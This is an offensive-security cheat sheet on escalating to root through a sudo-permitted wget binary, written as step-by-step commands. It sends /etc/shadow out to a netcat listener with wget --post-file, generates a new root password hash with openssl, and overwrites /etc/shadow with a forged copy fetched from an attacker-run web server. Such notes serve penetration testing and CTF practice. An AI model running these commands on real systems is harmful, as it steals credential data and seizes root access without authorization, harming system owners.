# Sudo Wget Privilege Escalation The "sudo wget" command may be vulnerable to privilege escalation (PrivEsc). ### Investigation ``` sudo -l (root) NOPASSWD: /usr/bin/wget ``` If we can execute **"wget"** as root, we may be able to escalate privileges. ### Modify /etc/shadow Get **"/etc/shadow"** and generate a new hash passwd, then set it to the shadow file, next upload it.\ That changes the root password. #### 1. Get the Content of /etc/shadow To see the content of /etc/shadow, we can use netcat listener.\ So First, start a listener in local machine. ``` nc -lvnp 4444 ``` In target machine, display the contents of the **"/etc/shadow"** to the local machine using the following command. ``` sudo /usr/bin/wget --post-file=/etc/shadow 4444 ``` We should see the content in our local machine via netcat listener.\ Copy the content. #### 2. Create a New Shadow File We create a new shadow file in local. The shadow file will be stored into the target **/etc/shadow** later. ``` vim shadow.txt ``` In vim editor (or nano, vi, etc.), paste the content of /etc/shadow which we've copied in the previous section. #### 3. Create a New Root User Password and Add to Shadow File Generate a new hash password for a new root user in local machine. ``` # -6: SHA512 openssl passwd -6 -salt 'salt' 'password' ``` Copy the generated password and paste it at the password of the root user into the **"shadow\.txt"**.\ As a result, the contents of the **"shadow\.txt"** should look like this: ``` root:$6$salt$IxDD...DCy.g.:18195:0:99999:7::: ... ``` #### 4. Transfer the Content of the Shadow File To put the **shadow\.txt** into the target machine, start web server for hosting this file. ``` python3 -m http.server 8000 ``` Download this file into the **/etc/shadow** in remote machine. To do that, we need to run it as root. ``` sudo /usr/bin/wget http://:8000/shadow.txt -O /etc/shadow ``` Finally, you can switch to the root user with the password we've created. ``` su root ```